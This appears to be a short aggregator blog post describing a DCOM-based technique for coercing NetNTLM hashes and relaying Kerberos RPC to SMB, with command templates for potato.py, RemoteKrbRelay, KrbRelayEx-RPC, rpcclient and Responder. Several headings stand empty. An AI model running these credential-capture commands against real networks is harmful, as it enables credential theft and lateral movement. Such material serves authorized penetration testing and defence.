Listen to this Post
Andrew Oliveau recently published a technique for triggering NetNTLMv1/NetNTLMv2 hashes via DCOM using an administrative account. This method allows for relaying or cracking these hashes, which can be useful in penetration testing and red team engagements.
Original Technique:
Alternative Approach:
Instead of modifying AppIDs to use the interactive user via the remote registry, existing CLSIDs configured for interactive users can be exploited to coerce RPC authentication from logged-on users.
Limitations:
- Remotely triggered DCOM RPC authentication via NTLM/Kerberos cannot be relayed to SMB (results in
STATUS_BAD_IMPERSONATION_LEVEL). - No relaying to LDAP due to DCOM hardening.
- Primarily useful for hash retrieval and cracking.
You Should Know:
1. Modifying Potato.py for NetNTLMv2 Capture
The original Potato.py tool requires slight modifications to store NetNTLMv2 hashes. A Pull Request (PR) has been submitted for this enhancement:
– Potato.py PR for NetNTLMv2 Storage
Example Command:
python3 potato.py -i <attacker_ip> -l <listener_port> -H <output_hash_file>
2. Enhancing RemoteKrbRelay for Hash Retrieval
Similarly, RemoteKrbRelay lacked NetNTLMv2 storage capability. A PR has been submitted to address this:
– RemoteKrbRelay PR for Hash Storage
Usage:
./RemoteKrbRelay -t <target> -c <CLSID> -o <output_file>
- Relaying Kerberos RPC to SMB via KrbRelayEx-RPC
With slight modifications, KrbRelayEx-RPC can relay incoming Kerberos RPC authentication to SMB (thanks to Andrea Pierini for the guidance).
Requirements:
- Must be executed on a Linux host (Port 135 is bound in Windows).
- A custom SPN domain (can be created via ADIDNS).
Modification Details:
Example Setup:
./KrbRelayEx-RPC --spn HTTP/<fake_domain> --target <smb_target> --relay
What Undercode Say:
This technique is powerful for credential harvesting in internal penetration tests but has limitations due to DCOM hardening. Key takeaways:
– Linux is preferred for RPC relaying (Port 135 restrictions on Windows).
– Kerberos relaying requires custom SPNs (ADIDNS can help).
– NTLM relaying is restricted to hash extraction only.
Additional Useful Commands:
- Check DCOM permissions:
Get-WmiObject -Namespace "root\cimv2" -Class Win32_DCOMApplicationSetting
- Force NTLM authentication via RPC:
rpcclient -U "" -N <target_ip> -c "getusername"
- Extract NetNTLMv2 with Responder:
sudo responder -I eth0 -v
Expected Output:
A successful execution will yield NetNTLMv1/NetNTLMv2 hashes for offline cracking or further exploitation. Always ensure proper authorization before testing in production environments.
Further Reading:
References:
Reported By: UgcPost 7315634109320450048 – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
